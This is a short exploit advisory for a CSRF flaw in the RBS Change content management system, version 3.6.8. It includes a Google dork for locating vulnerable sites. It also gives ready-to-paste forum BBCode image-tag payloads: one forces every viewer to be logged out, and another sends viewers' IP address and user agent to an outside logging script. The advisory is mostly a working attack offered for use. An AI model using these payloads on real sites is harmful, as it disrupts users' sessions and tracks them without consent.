# Exploit Title: RBS Change Complet Open Source CSRF # Google Dork: intext:"une réalisation rbs" # Date: 10/01/2014 # Exploit Author: KrustyHack # Vendor Homepage: http://www.rbschange.fr/ # Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html # Version: 3.6.8 # Tested on: Linux HOW TO ====== Just add [img="http://CSRF"][/img] on forum signature or forum posts. TEST ==== Based on demo.rbschange.fr: --------------------------- [img="http://server/fr/deconnexion/"][/img] Will disconnect all users who load the image. Other example: -------------- [img="http://www.example.com/log.php"][/img] To get users ip, user agent, ...